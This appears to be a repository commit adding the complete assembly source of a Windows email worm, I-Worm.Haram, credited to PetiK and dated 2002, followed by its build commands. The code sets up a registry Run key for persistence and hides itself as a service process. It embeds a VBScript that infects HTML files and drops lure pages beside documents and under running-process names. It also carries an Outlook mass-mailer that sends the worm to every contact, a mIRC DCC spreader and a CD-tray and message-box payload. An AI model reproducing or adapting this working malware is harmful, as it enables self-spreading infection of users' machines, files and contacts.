Add files via upload

Win32/I-Worm.Haram.asm

@@ -0,0 +1,592 @@
+comment *
+Name : I-Worm.Haram
+Author : PetiK
+
+Language : win32asm
+Date : May 13th 2002 - June 1st 2002
+
+Size : 5192 bytes (compressed with Petite Tool)
+
+Comments :	- Copy to %sysdir%\FunnyGame.exe
+		- Search all doc files in "Personal" folder and create a new virus html file:
+
+				example : document.doc -> document.htm
+						1)		2)
+
+			1) Good DOC file
+			2) Good HTM virus (1571 bytes)
+
+		- Put the name of all active process and add .htm:
+
+				example : process.exe -> process.exe.htm
+						3)		4)
+
+			3) Real name of active process
+			4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
+
+		- Create a random name file in StarUp folder to spread with Outlook
+
+		- On the 10th, payload : open and close CD door and display a messagebox in loop
+
+*
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+include win32api.inc
+
+LF      equ     10
+CR      equ     13
+CRLF    equ     <13,10>
+
+@pushsz         macro   msg2psh, empty
+                local   next_instr
+                ifnb    <empty>
+                %out    too much arguments in macro '@pushsz'
+                .err
+                endif
+                call    next_instr
+                db      msg2psh,0
+    next_instr:
+endm
+
+@endsz  	macro
+	        local   nxtchr
+	nxtchr: lodsb
+	        test    al,al
+	        jnz     nxtchr
+endm
+
+api	macro a
+	extrn a:proc
+	call a
+endm
+
+WIN32_FIND_DATA		struct
+dwFileAttributes	dd 0
+ftCreationTime		dd ?,?
+ftLastAccessTime	dd ?,?
+ftLastWriteTime		dd ?,?
+nFileSizeHigh		dd 0
+nFileSizeLow		dd 0
+dwReserved0		dd 0,0
+cFileName		db 260 dup(0)
+cAlternateFileName	db 14  dup(0)
+			db  2  dup (0)
+WIN32_FIND_DATA		ends
+
+PROCESSENTRY32 STRUCT
+       dwSize              DWORD ?
+       cntUsage            DWORD ?
+       th32ProcessID       DWORD ?
+       th32DefaultHeapID   DWORD ?
+       th32ModuleID        DWORD ?
+       cntThreads          DWORD ?
+       th32ParentProcessID DWORD ?
+       pcPriClassBase      DWORD ?
+       dwFlags             DWORD ?
+       szExeFile           db 260 dup(?)
+PROCESSENTRY32 ENDS
+
+start:	pushad
+	@SEH_SetupFrame		<jmp end_worm>
+
+hide_the_worm:
+	call hide_worm
+
+get_name:
+	push	50
+	mov	esi,offset orgwrm
+	push	esi
+	push	0
+	api	GetModuleFileNameA
+
+get_copy_name:
+	mov	edi,offset cpywrm
+	push	edi
+	push	50
+	push	edi
+	api	GetSystemDirectoryA
+	add	edi,eax
+	mov	eax,'nuF\'
+	stosd
+	mov	eax,'aGyn'
+	stosd
+	mov	eax,'e.em'
+	stosd
+	mov	eax,'ex'
+	stosd
+	pop	edi
+
+copy_worm:
+	push	1
+	push	edi
+	push	esi
+	api	CopyFileA
+	test	eax,eax
+	je	ok_copy
+
+	push	50
+	push	edi
+	push	1
+	@pushsz "Haram"
+	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
+	push	80000002h
+	api	SHSetValueA
+
+	push	50
+	push	offset msgwrm
+	push	esi
+	api	GetFileTitleA
+	push	10h
+	push	offset msgwrm
+	@pushsz "ERROR : this file is not a valid Win32 file."
+	push	0
+	api	MessageBoxA
+ok_copy:
+
+call	inf_doc_personal
+
+get_startup_path:
+	push	0
+	push	7
+	push	offset startup
+	push	0
+	api	SHGetSpecialFolderPathA
+	push	offset startup
+	api	SetCurrentDirectoryA
+
+call	cr_vbsname
+
+	mov	edi,offset vbsname
+
+	push	0
+	push	1
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	edi
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	push	e_vbs - s_vbs
+	push	offset s_vbs
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+
+
+payload:
+	mov	eax,offset sysTime
+	push	eax
+	api	GetSystemTime
+	lea	eax,sysTime
+	cmp	word ptr [eax+6],10
+	jne	end_payload
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	@pushsz "set CDAudio door open"
+	api	mciSendStringA
+
+	push	500
+	api	Sleep
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	@pushsz "set CDAudio door closed"
+	api	mciSendStringA
+
+	push	40h
+	@pushsz "I-Worm.Haram"
+	@pushsz "Coded by PetiK - ©2002 - France"
+	push	0
+	api	MessageBoxA
+
+	api	GetTickCount
+	push	10000
+	pop	ecx
+	xor	edx,edx
+	div	ecx
+	inc	edx
+	mov	ecx,edx
+	push	ecx
+	api	Sleep
+	jmp	payload
+
+end_payload:
+
+call	inf_process
+
+end_worm:
+	@SEH_RemoveFrame
+	popad
+	push	0
+	api	ExitProcess
+
+hide_worm	Proc
+	pushad
+	@pushsz	"KERNEL32.DLL"
+	api	GetModuleHandleA
+	xchg	eax,ecx
+	jecxz	end_hide_worm
+	@pushsz	"RegisterServiceProcess"		; Registered as Service Process
+	push	ecx
+	api	GetProcAddress
+	xchg	eax,ecx
+	jecxz	end_hide_worm
+	push	1
+	push	0
+	call	ecx
+	end_hide_worm:
+	popad
+	ret
+hide_worm	EndP
+
+Spread_Mirc	Proc
+	push	offset cpywrm
+	push	offset mirc_exe
+	api	lstrcpy
+	call	@mirc
+	db 	"C:\mirc\script.ini",0
+	db 	"C:\mirc32\script.ini",0		; spread with mIRC. Thanx to Microsoft.
+	db 	"C:\progra~1\mirc\script.ini",0
+	db 	"C:\progra~1\mirc32\script.ini",0
+	@mirc:
+	pop	esi
+	push	4
+	pop	ecx
+	mirc_loop:
+	push	ecx
+	push	0
+	push	80h
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	esi
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	@tmp_mirc:
+	push	e_mirc - s_mirc
+	push	offset s_mirc
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+	@endsz
+	pop	ecx
+	loop	mirc_loop
+	end_spread_mirc:
+	ret
+Spread_Mirc	EndP
+
+
+
+inf_doc_personal 	Proc
+	pushad
+get_personal_folder:
+	push	0
+	push	5
+	push	offset personal
+	push	0
+	api	SHGetSpecialFolderPathA
+	push	offset personal
+	api	SetCurrentDirectoryA
+fff_doc:
+	push	offset ffile
+	@pushsz "*.doc"
+	api	FindFirstFileA
+	inc	eax
+	je	end_f_doc
+	dec	eax
+	mov	[hfind],eax
+
+cr_file:
+	push	offset ffile.cFileName
+	push	offset new_file
+	api	lstrcpy
+	mov	esi,offset new_file
+	push	esi
+	api	lstrlen
+	add	esi,eax
+	sub	esi,4						; to become \SYSTEM\Wsock32
+	mov	[esi],"mth."
+	lodsd
+
+	push	0
+	push	1
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	offset new_file
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	push	e_htm - s_htm
+	push	offset s_htm
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+
+fnf_doc:
+	push	offset ffile
+	push	[hfind]
+	api	FindNextFileA
+	test	eax,eax
+	jne	cr_file
+	push	[hfind]
+	api	FindClose
+end_f_doc:
+	popad
+	ret
+inf_doc_personal	EndP
+
+
+inf_process	Proc
+	popad
+create_folder:
+	push	0
+	@pushsz "C:\backup"
+	api	CreateDirectoryA
+	@pushsz "C:\backup"
+	api	SetCurrentDirectoryA
+enum_process:	
+	push	0
+	push	2
+	api	CreateToolhelp32Snapshot
+	mov	lSnapshot,eax
+	inc	eax
+	je	end_inf_process
+	lea	eax,uProcess
+	mov	[eax.dwSize], SIZE PROCESSENTRY32
+	lea	eax,uProcess
+	push	eax
+	push	lSnapshot
+	api	Process32First
+check_process:
+	test	eax,eax
+	jz	end_process
+	push	ecx
+	mov	eax,ProcessID
+	push	offset uProcess
+	cmp	eax,[uProcess.th32ProcessID]
+	je	NextProcess
+	lea	ebx,[uProcess.szExeFile]
+
+	push	ebx
+	push	offset new_name
+	api	lstrcpy
+	mov	edi,offset new_name
+	push	edi
+	api	lstrlen
+	add   edi,eax
+	mov   eax,"mth."
+	stosd
+	xor   eax,eax
+	stosd
+	push	offset new_name
+	@pushsz "System.htm"
+	api	lstrcmp
+	test	eax,eax
+	jz	NextProcess
+
+	push	0
+	push	1
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	offset new_name
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	push	e_htm - s_htm
+	push	offset s_htm
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+
+NextProcess:
+	push	offset uProcess
+	push	lSnapshot
+	api	Process32Next
+	jmp	check_process
+end_process:
+	push	lSnapshot
+	api	CloseHandle
+end_inf_process:
+	pushad
+	ret
+inf_process	EndP
+
+
+cr_vbsname	Proc
+	mov	edi,offset vbsname
+;	api	GetTickCount
+	push	10
+	pop	ecx
+;	xor	edx,edx
+;	div	ecx
+;	inc	edx
+;	mov	ecx,edx
+	name_g:
+	push	ecx
+	api	GetTickCount
+	push	'9'-'0'
+	pop	ecx
+	xor	edx,edx
+	div	ecx
+	xchg	eax,edx
+	add	al,'0'
+	stosb
+	api	GetTickCount
+	push	100
+	pop	ecx
+	xor	edx,edx
+	div	ecx
+	push	edx
+	api	Sleep
+	pop	ecx
+	loop	name_g
+	mov	eax,"sbv."
+	stosd
+	ret
+cr_vbsname	EndP
+
+
+
+.data
+ffile	WIN32_FIND_DATA	<?>
+sysTime	db 16 dup(0)
+
+uProcess	PROCESSENTRY32 <?>
+ProcessID	dd ?
+lSnapshot	dd ?
+new_name	db 100 dup (?)
+
+orgwrm		db 50 dup (0)
+cpywrm		db 50 dup (0)
+msgwrm		db 50 dup (0)
+startup		db 70 dup (0)
+personal	db 70 dup (0)
+new_file	db 90 dup (0)
+vbsname		db 20 dup (0)
+byte_write	dd ?
+hfind		dd ?
+
+s_mirc:	db "[script]",CRLF
+	db ";Don't edit this file.",CRLF,CRLF
+	db "n0=on 1:JOIN:{",CRLF
+	db "n1= /if ( $nick == $me ) { halt }",CRLF
+	db "n2= /.dcc send $nick "
+mirc_exe	db 50 dup (?)
+	db CRLF,"n3=}",0
+e_mirc:	
+
+
+s_htm:	db '<haram>',CRLF
+	db '<html><head><title>Windows Media Player</title></head><body>',CRLF
+	db '<script language=VBScript>',CRLF
+	db 'On Error Resume Next',CRLF
+	db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
+	db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
+	db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
+	db 'If err.number=429 Then',CRLF
+	db 'kupfkvqg.Run javascript:location.reload()',CRLF
+	db 'Else',CRLF,CRLF
+	db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
+	db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
+	db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
+	db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
+	db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
+	db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
+	db 'End If',CRLF,CRLF
+	db 'Function glvqglvb(dir)',CRLF
+	db 'If upfkupfk.FolderExists(dir) Then',CRLF
+	db '  Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
+	db '  Set bbblvqgl=bbbbbbbb.Files',CRLF
+	db '  For each lvqgvqgl in bbblvqgl',CRLF
+	db '    lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
+	db '    If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
+	db '      Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
+	db '      if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
+	db '        rhmwrrhm.Close()',CRLF
+	db '        Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
+	db '        htmorg=rhmwrrhm.ReadAll()',CRLF
+	db '        rhmwrrhm.Close()',CRLF
+	db '        Set mwrrhmwr=document.body.createTextRange',CRLF
+	db '        Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
+	db '        rhmwrrhm.WriteLine "<haram>"',CRLF
+	db '        rhmwrrhm.Write(htmorg)',CRLF
+	db '        rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
+	db '        rhmwrrhm.Close()',CRLF
+	db '      Else',CRLF
+	db '        rhmwrrhm.Close()',CRLF
+	db '      End If',CRLF
+	db '    End If',CRLF
+	db '  Next',CRLF
+	db 'End If',CRLF
+	db 'End Function',CRLF
+	db '</script></body></html>',0
+e_htm:
+
+s_vbs:	db 'On Error Resume Next',CRLF
+	db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
+	db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
+	db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
+	db 'copyname = sys&"\FunnyGame.exe"',CRLF
+	db 'Set htgx = CreateObject("Outlook.Application")',CRLF
+	db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
+	db 'For each c In ofcc.AddressLists',CRLF
+	db 'If c.AddressEntries.Count <> 0 Then',CRLF
+	db 'For d = 1 To c.AddressEntries.Count',CRLF
+	db 'Set etldb = htgx.CreateItem(0)',CRLF
+	db 'etldb.To = c.AddressEntries(d).Address',CRLF
+	db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
+	db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
+	db 'etldb.Attachments.Add(copyname)',CRLF
+	db 'etldb.DeleteAfterSubmit = True',CRLF
+	db 'If etldb.To <> "" Then',CRLF
+	db 'etldb.Send',CRLF
+	db 'End If',CRLF
+	db 'Next',CRLF
+	db 'End If',CRLF
+	db 'Next',0
+e_vbs:
+
+ends
+end	start
+
+*************************************************************************
+
+@tasm32 /M /ML haram.asm
+@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def
+rem pause
+rem upx -9 haram.exe
+@del *.obj
+rem pause
+
+*************************************************************************
+
+IMPORTS
+
+SHLWAPI.SHSetValueA
+SHELL32.SHGetSpecialFolderPathA